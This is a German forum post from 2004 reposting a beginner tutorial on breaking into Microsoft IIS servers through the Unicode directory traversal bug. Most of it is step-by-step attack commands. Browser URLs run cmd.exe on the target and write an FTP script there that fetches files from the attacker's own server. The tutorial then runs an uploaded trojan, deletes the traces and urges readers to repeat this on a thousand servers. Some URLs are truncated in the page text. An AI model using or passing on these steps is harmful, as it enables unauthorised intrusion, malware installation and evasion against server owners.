IIS Hacking

Dieses Thema im Forum "Security Tutorials" wurde erstellt von Morphi1985, 21. Dezember 2004 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 21. Dezember 2004
    TUT ist NICHT von mir!!!

    ==================================
    IIS HAcKing TuT bY GroundZero
    © IHC Security Research Group
    ==================================

    Moin FreakZ,

    Heute zeig ich auch(dir) wie man den IIS bug(fehler im systems oder software) mal bisschen ausnuzt.
    Also zuerst muss ihr disen bug Scannen, da macht sich der FX-Scanner ganz gut! Dieses Totorial
    ist fuer Anfaenger gedacht, und zeigt nicht wie man IIS Server sploitet!

    Jetzt zum eigentlichen Hacken,wenn ihr ein resul in euren scanner habt(So sieht das dann aus)

    Ip (ist klar)
    Hostname : (ist glaub ich auch klar)
    Unicode : (der unicode der benzut wird sieht ungef?r so aus /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe kann aber auch anders sein)
    Drive c space : (der Space der auf der festplatte frei ist wenn es mehrer festplatten sind steht es da auch)
    ASP exploit : No
    Firewall : (Ja ob der Computer ne Firewall hat wenn ja braucht ihr denn garnicht probiren ^^)

    Und benuzt noch wenn es geht einen Proxy, obwohl ihr damit auch net perfekt anonym seid, aber es hilft!

    So weiter gehts , wir muessen nun ein eigenes Script schreiben auf dem anderem Rechner(Hoert sich alles schwer an ist aber nicht so schwer)das macht ihr mit eurem Browser.
    Und das ist der 1. schritt,geb das in euren Browser ein.
    http:///##IP##/scripts/..%%35c..%%35cwin....exe?/c+dir+c:\ (oder /c+dir+d:\,/c+dir+e:\ USW )


    ##IP## :Sthet für die ip des gescannten server von euch.
    /c+dir+c:\ :Zeig euch denn Inhalt der Festplatte an und denn Space
    scripts/..%%35c..%%35cwinnt/system32/cmd.exe? :Ist der Unicode/String

    Nun k?nnt ihr ein bisschen auf der Festplatte rumschauen,ok es geht weiter.

    Jetzt folgt der n?chste Schritt also gebt wieder in euren Browser ein:
    http://IP/scripts/..%%35c..%%35cwin...EIN\SOL
    L

    ABER ACHTET DARAUF IM WINNT ORDNER WENN IHR ES DA MACHT HABT IHR MACHNMAL KEINE SCHREIB RECHTE DAN WAEHLT EIN ANDERS VERZECIHNISS!

    Wenn ihr nun ein anderes Verzeichniss gewaehlt habt (falls es der fall ist siehe vorigen Schritt) kontrolliert ob es auch existiert.
    Den Pfad muesstet ihr nach eurem anpassen , wird nun ein leeres Verzeichniss angezeigt , dann waren wir erfolgreich.

    Weiter gehts,nun muessen wir die cmd.exe kopieren um ein Dos Echo script zu schreiben, den Command in euren Browser eingeben :
    http://ip/scripts/..%%35c..%%35cwinnt/sy...+wunschname.exe

    Für Wunschname.exe koennt ihr ein belibigen Namen auswaehlen aber ihr muesst dann bei den weiteren Schritten beachten dass ihr nach dem Namen das .exe nicht vergessen habt, das ist WICHTIG!!!

    Jetzt kommen wir zum eigentlichen Script zum Serv-u oder andere Datei zu Geten (hochladen).
    Also macht schonmal nen HomeFTP oder Pub ,Webspace bereit wo die datei liegen.
    Los gehts:
    1.) http://ip/scripts/wunschname.exe?/c+echo+open+ftpip+port>>c:\unser\verzeichniss\unserscriptname.txt

    Für ftpip steht die ip des Webspace oder Pub etc.
    Für den Port steht der Port des Webspace oder Pub etc.
    Für c:\unser\verzeichniss\ dsas Verzeichniss angeben was ihr vorhin erstellet habt.

    2.) http://IP/scripts/wunschname.exe?/c+echo+Anonymous>>c:\unser\verzeichniss\unserscriptname.txt

    Für Anonymous denn username des Webspace oder Pub etc.

    3.)http://IP/scripts/wunschname.exe?/c+echo+password>>c:\unser\verzeichniss\unserscriptname.txt

    Für Password das Password vom Webspace oder Pub etc.

    4.)http://IP/scripts/wunschname.exe?/c+echo+BINARY>>c:\unser\verzeichniss\unserscriptname.txt

    5.)http://IP/scripts/wunschname.exe?/c+echo+get+Datei.(exe.jpg.txt.usw)>>c:\unser\verzeichniss\unserscriptname.txt

    Für Datei(exe.jpg.txt.usw) die Datei die Ihr hochladen wollt vom Webspace oder Pub etc.

    6.)http://IP/scripts/wunschname.exe?/c+echo+quit>>c:\unser\verzeichniss\unserscriptname.txt

    Damit ihr nachdem hochladen auch dissconectet seid.

    Jetzt musst ihr gucken ob das Script erfolgreich geschriben wurden ist das macht ihr mit dem befehl:
    http://ip/scripts/wunschname.exe?/c+type...rscriptname.txt
    Wenn euer Script richtig ist sollte es so ausehen:

    IP VOM FTP SERVER&Port
    USERNAME
    PASSWORD
    BINARY
    get Datei
    quit

    Ok jetzt habt ihr es fast geschaft um das Script jetzt auszufuehren gebe wieder im Browser ein:
    http://ip/scripts/..%%35c..%%35cwinnt/sy...rscriptname.txt

    !!!Jetzt dauert es bis die Datei/en oben sind es kommt drauf an wie gro? sie sind!!!!

    Leider wurde die Datei/en nicht in dein Verzeichniss Hochgeladen also mussen wir sie in dein Verzeichniss moven(verschieben),
    dass macht ihr mit demm Befehl: http://IP/scripts/wunschname.exe?/c+move+Datei*.*+"c:\unser\verzeichniss\"

    Fuer Datei bitte den Namen der Datei angeben die du hochgeladen hast.

    Ihr habt es geschaft, ihr habt die Datei/en hochgeladen und in euer Verzeichniss kopiert

    Bitte hinterlaesst keine Spuren und loescht euer Script mit dem Befehl :
    http://ip/scripts/wunschname.exe?/c+del+...rscriptname.txt

    Spuren Weg *geil wa*

    Sooooo jetzt zum schluss um die Datei/en ausfuehren zb. einen Trojaner Server einfach:
    http://ip/scripts/..%%35c..%%35cwinnt/sy...hniss\datei.exe
    im Browser eingeben.

    Aber jetzt habt ihr es geschaft. Und das macht ihr jetzt bei 1000 Server dann habt ihr es richtig druff *g* Augenzwinkern )

    // Ich will hier net auf andere Moeglichkeiten eingehen einen IIS Server zu hacken, das es fuer Anfaenger ist! //

    ====================
    PreSenD bY GroundZero
    ====================
     
  3. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.